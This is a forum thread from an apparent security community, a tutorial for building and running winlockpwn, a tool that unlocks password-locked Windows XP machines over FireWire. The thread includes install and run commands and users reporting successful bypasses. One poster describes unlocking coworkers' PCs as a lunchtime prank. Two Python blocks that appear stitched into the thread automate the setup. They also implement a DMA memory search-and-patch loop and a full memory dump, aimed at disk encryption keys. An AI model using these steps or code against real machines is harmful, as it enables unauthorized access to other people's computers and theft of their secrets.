Remote Exploit Forums

#1 jonah_15, 05-12-2008, 10:56 AM

Tutorial Winlockpwn

Adam Boileau (hxxp://wwx.storm.net.nz/projects/16) recently released source code for a tool, winlockpwn, that can unlock a password-locked Windows machine in seconds.

Timothy Legge wrote some instructions on how to install this and get winlockpwn working on Ubuntu. I've used Timothy's original document to document how to get the tool working on BackTrack 2 & BackTrack 3 Beta.

Thanks

Jonah_15

Replace hxxp with http & wwx with www

Step 1

First we need to install the required libraries:

libraw1394 v1.3.0

hxxp://linux1394.org/dl/libraw1394-1.3.0.tar.gz
tar xvfz libraw1394-1.3.0.tar.gz
cd libraw1394-1.3.0
./configure
make
make dev
make install

Step 2

Install Swig

hxxp://downloads.sourceforge.net/swig-1.3.34.tar.gz
tar xvfz swig-1.3.34.tar.gz
cd swig-1.3.34
./configure
make
make install

Step 3

Install Python 2.3

hxxp://wwx.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar xvfz Python-2.3.6.tgz
mv Python-2.3.6 python-2.3
cd python-2.3
./configure
make
make install

This will install python in /usr/local which means you need to update each script to reference this location.

Step 4

Search for and comment out the __attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line:

vi /usr/local/include/libraw1394/raw1394.h

Step 5

download the software from hxxp://wwx.storm.net.nz/projects/16

hxxp://wwx.storm.net.nz/static/files...394-1.0.tar.gz
tar xvfz pythonraw1394-1.0.tar.gz
cd pythonraw1394
wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make

Step 6

load the module and set some permissions:

modprobe raw1394
chmod 666 /dev/raw1394

Step 7

Copy libraw1394.so.8 to /lib:

cd /usr/local/lib/
cp libraw1394.so.8 /lib

Step 8

Plug in the firewire cable into both your backtrack system and the target windows system.

Step 9

run businfo to check the port configurations:
vi businfo (update the location of python to be /usr/local/bin/python)
./businfo

Step 10

vi romtool (update the location of python to be /usr/local/bin/python)
./romtool -s 0 ipod.csr

Step 11

vi winlockpwn (update the location of python to be /usr/local/bin/python)
./winlockpwn 0 1 3
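The three hand edits the tutorial above asks for (the header edit in Step 4, the Makefile path in Step 5, and the interpreter path in Steps 9-11) gathered into one script. This is an added example for this thread, not code from pythonraw1394 or winlockpwn. It assumes that "update the location of python" means each script's #! line, and that the only Python-specific strings in the pythonraw1394 Makefile are its include paths (the two lines williamc posts below are the shape it expects). Default paths are the tutorial's; pass your own on the command line. Run it with whatever Python you will build the wrapper against, since it reads the include directory from the interpreter it runs under.

```python
"""Automate the hand edits from the winlockpwn tutorial.

Added example for this thread; not part of pythonraw1394 or winlockpwn.
Step 4:     strip `__attribute__ ((deprecated));` from raw1394.h, leaving
            each declaration terminated by ';' whether the attribute sat
            on the declaration's own line or on the line after it.
Step 5:     point the pythonraw1394 Makefile at the Python headers that
            are actually installed.  The error in post #2, "No rule to
            make target '/usr/local/include/python2.5'", is that path
            not existing on the box.
Steps 9-11: rewrite the '#!' line of businfo, romtool and winlockpwn
            (assumption: that is what "update the location of python"
            refers to).
"""
import re
import sys

# Whitespace before the attribute is consumed too, so a declaration split
# over two lines collapses back onto one line ending in ';'.
DEPRECATED_RE = re.compile(r"\s*__attribute__\s*\(\(\s*deprecated\s*\)\)\s*;")
# Matches /usr/include/python2.5, /usr/local/include/python2.3, ...
PY_INCLUDE_RE = re.compile(r"/usr(?:/local)?/include/python\d\.\d+")


def default_python_include():
    """Include dir of the interpreter running this script."""
    try:
        import sysconfig
        return sysconfig.get_paths()["include"]
    except ImportError:  # Python older than 2.7, e.g. the 2.3/2.5 in the thread
        from distutils.sysconfig import get_python_inc
        return get_python_inc()


def strip_deprecated_attribute(header_text):
    """Return (new_text, replacements) with every deprecated attribute removed."""
    return DEPRECATED_RE.subn(";", header_text)


def point_makefile_at_python(makefile_text, include_dir=None):
    """Return (new_text, replacements) with every python include path rewritten.

    Both the dependency line (`_raw1394.so: ... /usr/include/python2.5`)
    and the `-I/usr/include/python2.5` in the recipe are covered.
    """
    if include_dir is None:
        include_dir = default_python_include()
    return PY_INCLUDE_RE.subn(include_dir, makefile_text)


def rewrite_shebang(script_text, interpreter):
    """Return (new_text, changed) with the first '#!' line pointed at interpreter."""
    parts = script_text.split("\n", 1)
    if not parts[0].startswith("#!"):
        return script_text, False
    parts[0] = "#!" + interpreter
    return "\n".join(parts), True


def _rewrite(path, func, *args):
    """Apply func to the file at path in place; report what happened."""
    fh = open(path)
    text = fh.read()
    fh.close()
    new_text, changed = func(text, *args)
    if changed:
        fh = open(path, "w")
        fh.write(new_text)
        fh.close()
        print("%s: updated" % path)
    else:
        print("%s: unchanged" % path)


if __name__ == "__main__":
    # usage: python prep.py [HEADER] [MAKEFILE] [INTERPRETER] [SCRIPT ...]
    argv = sys.argv[1:]
    header = argv[0] if len(argv) > 0 else "/usr/local/include/libraw1394/raw1394.h"
    makefile = argv[1] if len(argv) > 1 else "pythonraw1394/Makefile"
    interp = argv[2] if len(argv) > 2 else "/usr/local/bin/python"
    scripts = argv[3:] or ["pythonraw1394/businfo", "pythonraw1394/romtool",
                           "pythonraw1394/winlockpwn"]
    _rewrite(header, strip_deprecated_attribute)
    _rewrite(makefile, point_makefile_at_python)
    for script in scripts:
        _rewrite(script, rewrite_shebang, interp)
```

Running it before Step 5's make replaces the vi sessions in Steps 4, 5, 9, 10 and 11; it is idempotent, so running it twice is harmless.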
#2 williamc, 05-17-2008, 06:11 PM

Is it necessary to install Python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
chmod +x ./winlockpwn
vi Makefile (reference /usr/local instead of /usr for python)
make
make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

William
#3 theprez98 (Super Moderator), 05-17-2008, 07:23 PM

Quote: Originally Posted by williamc
Is it necessary to install Python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:
make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.
Have you considered changing the reference in the makefile to 2.5 instead of 2.3?
#4 williamc, 05-17-2008, 09:46 PM

Yes, the Makefile references Python 2.5. Any other ideas? Has anyone got this to work following the tutorial?
#5 jonah_15, 05-20-2008, 11:29 AM

I also had problems with Python 2.5 but had no issues with Python 2.3.
#6 williamc, 05-20-2008, 04:38 PM

I got it working with Python 2.5. Here are the modified steps:

Code:
cd /pythonraw1394
nano Makefile
# modify lines as follows:
_raw1394.so: raw1394_wrap.c /usr/include/python2.5
	$(CC) -Wall -shared -fPIC -I/usr/include/python2.5 -I/usr/local/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so
No other modifications to the install were needed. I didn't modify businfo or winlockpwn.

I successfully wiped the password for a locked Windows XP SP2 machine! Ctrl+Alt+Del and Enter. No password needed.

Update:
After running this successfully, I am unable to run it again without restarting Backtrack. I believe the businfo retains the settings for the PC you first plug into. Any way to clear the 1394 settings (maybe take the device down?) and bring it back up in the clear?

William

#7 jonah_15, 05-20-2008, 06:06 PM

What I normally do is go into Windows Device Manager on the target and remove the iPod. After I've done this and plugged the FireWire cable back in, I can successfully run the attack again on the same Windows host.

I've not needed to reboot backtrack.

Nice job on Python 2.5

#8 williamc, 05-20-2008, 08:35 PM

I'm looking to get this working on Vista. From http://storm.net.nz/projects/16
"people successfully attacking Vista using a slightly modified msv1_0.dll technique"

I'm researching this, but if anyone can shed some light on it, please do. I've purchased a CardBus FireWire card for use on PCs that don't have FireWire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and you're in! Guys in my office have disabled FireWire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

An important note: if you're running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts, which may cause some "issues" if you're in a corporate environment. The 2 option only unlocks the PC, which should be enough for whatever mischief you're planning (and have permission to do).

William

#9 spudgunman, 05-21-2008, 11:36 PM

Anyone get this to work? (Not the program, but the pwnage.)

I get this error:

IOError: [Errno 22] Invalid argument

From firewire.py, line 693: "If a node doesn't feel like fulfilling a request, it will raise an IOError."

Now if you unplug the FireWire and plug it back in, repeatedly running the script, it will start scanning memory only to end with a device busy.

Seems that the "money time" is when the device is detected as a "Hard Drive"; you start scanning the memory at that point. Then the iPod comes in and all work ends.

Same issue on two computers.

What are people getting this to work on?

Also, I understand the idea; could this also work for gathering all the memory and getting the key for the encrypted HDD?
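What the tool is doing once the FireWire link is up, as an added example for this thread rather than winlockpwn's own code. Post #8 quotes the project page on the "msv1_0.dll technique" and post #9 describes the memory scan and the IOError: winlockpwn walks the locked machine's physical memory over the bus, finds the password-check routine in the loaded msv1_0.dll by byte signature and overwrites it. The sketch below is that loop against an in-memory fake of the target so it runs offline; FakeTarget stands in for a pythonraw1394 node (wrapping the real node to the same read/write interface is assumed, since its method names are not on this page), and SIG, PATCH and the memory layout are constructed for the demo, not the real tool's values. It models two things from the thread: a chunk the node refuses (the errno 22 IOError spudgunman hits) is skipped rather than aborting the scan, and a signature that straddles two reads is still found. dump_memory is the same loop with the write removed, which is the whole-memory acquisition spudgunman asks about at the end of his post.

```python
"""Signature search-and-patch over a DMA read/write primitive.

Added example for this thread, not winlockpwn's own code.  FakeTarget,
SIG, PATCH and the memory layout are constructed for the demo.
"""
import errno

PAGE = 4096

SIG = b"\x8b\xff\x55\x8b\xec\x83\xec\x10"  # constructed prologue bytes, not the real signature
PATCH = b"\xb0\x01\xc3"                     # mov al,1 ; ret -- an illustrative 'always succeed' stub


class FakeTarget:
    """Stand-in for a FireWire node: physical-address read/write.

    Chunks inside a page listed in refused_pages raise IOError(EINVAL),
    the way pythonraw1394's firewire.py reports a node that will not
    fulfil a request (post #9).
    """

    def __init__(self, size, refused_pages=()):
        self.mem = bytearray(size)
        self.refused = set(refused_pages)

    def read(self, addr, length):
        if addr // PAGE in self.refused:
            raise IOError(errno.EINVAL, "Invalid argument")
        return bytes(self.mem[addr:addr + length])

    def write(self, addr, data):
        self.mem[addr:addr + len(data)] = data


def scan_and_patch(target, size, sig, patch, start=0, chunk=PAGE, patch_all=False):
    """Walk [start, size) in chunk-byte reads and patch the first (or every) hit.

    Returns (hits, refused): physical addresses patched, and start
    addresses of chunks the node refused.  The last len(sig)-1 bytes of
    each window are carried into the next one, so a signature straddling
    a chunk boundary is matched exactly once.
    """
    hits, refused = [], []
    carry = b""
    addr = start
    while addr < size:
        n = min(chunk, size - addr)
        try:
            buf = target.read(addr, n)
        except IOError as exc:
            if exc.errno != errno.EINVAL:
                raise
            refused.append(addr)
            carry = b""          # cannot bridge a match across a hole
            addr += n
            continue
        window = carry + buf
        base = addr - len(carry)
        off = window.find(sig)
        while off != -1:
            hit = base + off
            hits.append(hit)
            target.write(hit, patch)
            if not patch_all:
                return hits, refused
            off = window.find(sig, off + 1)
        carry = window[-(len(sig) - 1):] if len(sig) > 1 else b""
        addr += n
    return hits, refused


def dump_memory(target, size, chunk=PAGE):
    """Read [0, size) into an image; refused chunks are zero-filled so that
    offsets in the image remain physical addresses.  Returns (image, refused)."""
    image, refused = bytearray(), []
    addr = 0
    while addr < size:
        n = min(chunk, size - addr)
        try:
            image += target.read(addr, n)
        except IOError as exc:
            if exc.errno != errno.EINVAL:
                raise
            refused.append(addr)
            image += b"\x00" * n
        addr += n
    return bytes(image), refused


def build_demo_target():
    """Constructed 8-page target: three copies of SIG, page 2 refused."""
    t = FakeTarget(8 * PAGE, refused_pages={2})
    t.write(1 * PAGE + 100, SIG)    # plain hit inside a page
    t.write(4 * PAGE - 3, SIG)      # straddles the page 3 / page 4 boundary
    t.write(6 * PAGE + 10, SIG)     # a later second copy
    return t


if __name__ == "__main__":
    t = build_demo_target()
    hits, refused = scan_and_patch(t, 8 * PAGE, SIG, PATCH, patch_all=True)
    print("patched at %s, refused chunks at %s"
          % ([hex(h) for h in hits], [hex(r) for r in refused]))
```

The default patch_all=False stops after the first hit, which is the conservative choice on an engagement; the refused-chunk list tells you how much of the address space the scan never saw, which matters when the answer is "nothing found".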
#10 jonah_15, 05-22-2008, 03:16 AM

I've successfully tested it on Sony kit, a number of Dells and a Tosh running Windows XP SP2. I do have a couple of Dell XPSs which it has failed on, as it blue-screens the devices.

The result I've had running it on Vista machines (I know this particular version of the tool is not for Vista) is that it also blue-screens.

I know you have tested against 2 computers so far; are they the same make?